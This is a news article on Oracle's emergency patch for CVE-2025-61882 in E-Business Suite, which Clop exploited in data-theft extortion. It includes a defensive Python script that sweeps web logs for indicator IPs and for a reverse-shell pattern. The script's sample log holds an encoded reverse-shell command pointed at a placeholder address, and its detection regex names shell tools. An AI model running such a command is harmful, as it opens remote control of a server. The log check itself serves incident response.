Oracle has patched a critical vulnerability in E-Business Suite that was actively exploited in data theft attacks by the Clop group. The zero-day, registered as CVE-2025-61882, allows unauthenticated remote code execution on affected systems.
The flaw is located in the Concurrent Processing component of Oracle E-Business Suite, specifically in its integration with BI Publisher.
According to Oracle, the vulnerability has a CVSS score of 9.8. An attacker can exploit it over the network without a username or password, BleepingComputer reports; a successful exploit executes arbitrary code on the server. The vulnerability affects E-Business Suite versions 12.2.3 through 12.2.14. Oracle has released an emergency patch that can only be installed if the October 2023 Critical Patch Update has already been applied, so installations that are behind on that update must apply it first before the emergency fix can go on.
The vulnerability has already been exploited by the Clop ransomware group, which stole large amounts of company data in August. Mandiant, part of Google Cloud, confirms that Clop chained multiple vulnerabilities in Oracle EBS, including several that were fixed in July 2025, together with this new zero-day, which was only patched this weekend.
Affected companies later received emails in which Clop claimed to have compromised their Oracle E-Business Suite systems and copied large amounts of documents. The senders demanded payment to prevent the stolen data from being made public.
Same hacker group also behind Salesforce extortion
It is noteworthy that exploit code for this vulnerability recently appeared on Telegram. The files were shared by a group calling itself Scattered Lapsus$ Hunters, which claims to consist of members of Scattered Spider, Lapsus$, and ShinyHunters. The group published files that it claims are related to the Clop attacks. The leaked archive contained Python scripts that can be used to exploit a vulnerable E-Business Suite installation, either to open a reverse shell or to execute commands on the server.
Oracle has since published indicators of compromise that match the leaked exploit files, including specific IP addresses. The company is urging customers to install the emergency patch as soon as possible, as the exploit is publicly available and actively being used. Because exploitation predates the patch, patching alone does not rule out an earlier compromise; the published indicators should also be checked against web server and application logs.
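As an added illustration of that log check (this is example code written for this article, not a script from Oracle or from the leaked archive), the following sweeps Apache/OHS-style access log lines against a set of IoC addresses and a simple reverse-shell heuristic. The IP addresses in it are RFC 5737 documentation addresses standing in for Oracle's published indicators, the reverse-shell regex is an assumption of this example rather than one of Oracle's indicators, and the log lines are constructed.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed placeholder indicators (RFC 5737 documentation addresses).
# They are NOT the IPs from Oracle's advisory; replace with the published set.
IOC_IPS = {ipaddress.ip_address(ip) for ip in ("203.0.113.10", "198.51.100.23")}

# Heuristic for the reverse-shell behaviour described in the leak. This is an
# assumption added for the example, not a pattern taken from Oracle's indicators.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|bash -i|nc -e|0>&1")

# Combined log format: client ip, identd, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    # Decode percent-encoding so a payload written as %2Fdev%2Ftcp%2F is still seen.
    fields["req_decoded"] = unquote(fields["req"])
    return fields


def reasons_for(fields: dict, ioc_ips=IOC_IPS):
    """List why a parsed line is suspicious; an empty list means no hit."""
    reasons = []
    try:
        if ipaddress.ip_address(fields["ip"]) in ioc_ips:
            reasons.append(f"ioc_ip:{fields['ip']}")
    except ValueError:
        pass  # hostname or garbage in the client field: no address match possible
    if REVERSE_SHELL_RE.search(fields["req_decoded"]):
        reasons.append("reverse_shell_pattern")
    return reasons


def match_line(line: str, ioc_ips=IOC_IPS):
    """Convenience wrapper: reasons for a single raw log line."""
    fields = parse_line(line)
    return [] if fields is None else reasons_for(fields, ioc_ips)


def sweep(lines, ioc_ips=IOC_IPS):
    """Run the checks over many lines and return the hits with their context."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        reasons = reasons_for(fields, ioc_ips)
        if reasons:
            hits.append({
                "ts": fields["ts"],
                "ip": fields["ip"],
                "req": fields["req_decoded"],
                "reasons": reasons,
            })
    return hits


# Constructed sample log: one benign request, one from an IoC address, and one
# from a non-IoC address carrying a percent-encoded reverse-shell string.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Oct/2025:10:15:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 512
203.0.113.10 - - [04/Oct/2025:10:15:07 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 512
10.0.0.77 - - [04/Oct/2025:10:16:30 +0000] "GET /OA_HTML/AppsLogin?x=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F203.0.113.10%2F4444%200%3E%261 HTTP/1.1" 500 0
"""

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOG.splitlines()):
        print(hit["ts"], hit["ip"], hit["reasons"], hit["req"][:80])
```

Feed it the real indicator list from Oracle's advisory in place of `IOC_IPS`, and run it over the full retention window rather than just recent days, since the August activity described above happened well before the patch existed.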
The same group appeared earlier this week, under the same name Scattered Lapsus$ Hunters, in connection with a large-scale extortion threat involving Salesforce. This suggests that a new coalition of well-known cybercriminals, previously active under names such as Lapsus$ and ShinyHunters, is running multiple parallel campaigns targeting enterprise software.